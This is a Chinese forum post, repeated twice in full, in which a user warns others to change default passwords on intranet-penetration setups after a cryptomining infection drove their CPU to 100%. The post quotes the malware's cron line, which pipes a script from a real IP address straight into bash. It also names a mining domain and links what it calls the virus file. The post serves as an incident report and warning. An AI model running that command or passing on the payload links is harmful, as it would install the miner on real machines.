本帖最后由 kaka1 于 2026-2-7 14:49 编辑
怪不得cpu一直100%
大家做内网穿透一定要记得改密码,默认密码不改一天就中招
[圖片] https://m.360buyimg.com/jdcms/jfs/t1/388335/1/20870/68863/6986dae5F084c8eb0/06122ba247da50fa.png
会一直从这个网址下载病毒:http://173.234.15.182/
CMD (/usr/bin/bash -c 'cd /tmp && bash <(curl -s http://173.234.15.182/check1.sh)' &)
解释:你的系统每隔一段时间就会自动从这个恶意 IP (173.234.15.182) 下载一个叫 check1.sh 的脚本并执行。就是这个脚本在反复下载并启动 Error84
域名:andrewtatemunityxcrypto.com
是一个极其明显的恶意挖矿域名。
PPID 为 1:说明它被伪装成了系统服务,由 systemd 开机自动启动,或者作为守护进程在后台运行。
病毒文件:https://cc-im-kefu-1256921685.7moor-fs1.com/im/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/28cc2321-6266-44bb-9049-fa43d4c90380/1.jpg
怪不得cpu一直100%
大家做内网穿透一定要记得改密码,默认密码不改一天就中招
[圖片] https://m.360buyimg.com/jdcms/jfs/t1/388335/1/20870/68863/6986dae5F084c8eb0/06122ba247da50fa.png
会一直从这个网址下载病毒:http://173.234.15.182/
CMD (/usr/bin/bash -c 'cd /tmp && bash <(curl -s http://173.234.15.182/check1.sh)' &)
解释:你的系统每隔一段时间就会自动从这个恶意 IP (173.234.15.182) 下载一个叫 check1.sh 的脚本并执行。就是这个脚本在反复下载并启动 Error84
域名:andrewtatemunityxcrypto.com
是一个极其明显的恶意挖矿域名。
PPID 为 1:说明它被伪装成了系统服务,由 systemd 开机自动启动,或者作为守护进程在后台运行。
病毒文件:https://cc-im-kefu-1256921685.7moor-fs1.com/im/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/28cc2321-6266-44bb-9049-fa43d4c90380/1.jpg